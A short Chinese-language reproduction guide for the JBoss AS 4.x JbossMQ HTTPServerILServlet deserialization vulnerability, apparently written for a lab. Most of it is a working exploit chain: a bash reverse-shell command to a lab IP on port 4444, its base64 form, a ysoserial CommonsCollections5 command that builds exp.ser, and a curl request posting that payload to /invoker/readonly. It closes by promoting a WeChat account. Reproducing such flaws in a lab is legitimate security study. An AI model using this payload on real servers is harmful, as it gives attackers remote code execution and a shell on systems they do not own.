漏洞简介
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
影响范围
JBoss AS 4.x及之前版本
漏洞复现
拉去镜像
访问ip
查看这个/invoker/readonly目录
然后生成一个payload文件,使用ysoserial.jar进行payload构造,反弹shell
bash -i >& /dev/tcp/192.168.182.131/4444 0>&1
#base64 编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4Mi4xMzEvNDQ0NCAwPiYx
然后执行,在该目录生成一个 exp.ser,1.jar是ysoserial.jar的重命名
java -jar 1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4Mi4xMzEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}" >exp.ser
工具下载:ysoserial 安装使用调试教程 – JohnFrod's Blog
然后开启监听端口
然后进行curl访问下面的页面
curl http://192.168.182.131:8080/invoker/readonly --data-binary @exp.ser
然后看是否反弹shell成功
这样jboss漏洞就复现完成了
如果想要了解2023hvv期间漏洞,可关注微信公众号:猫蛋儿安全或github:MDSEC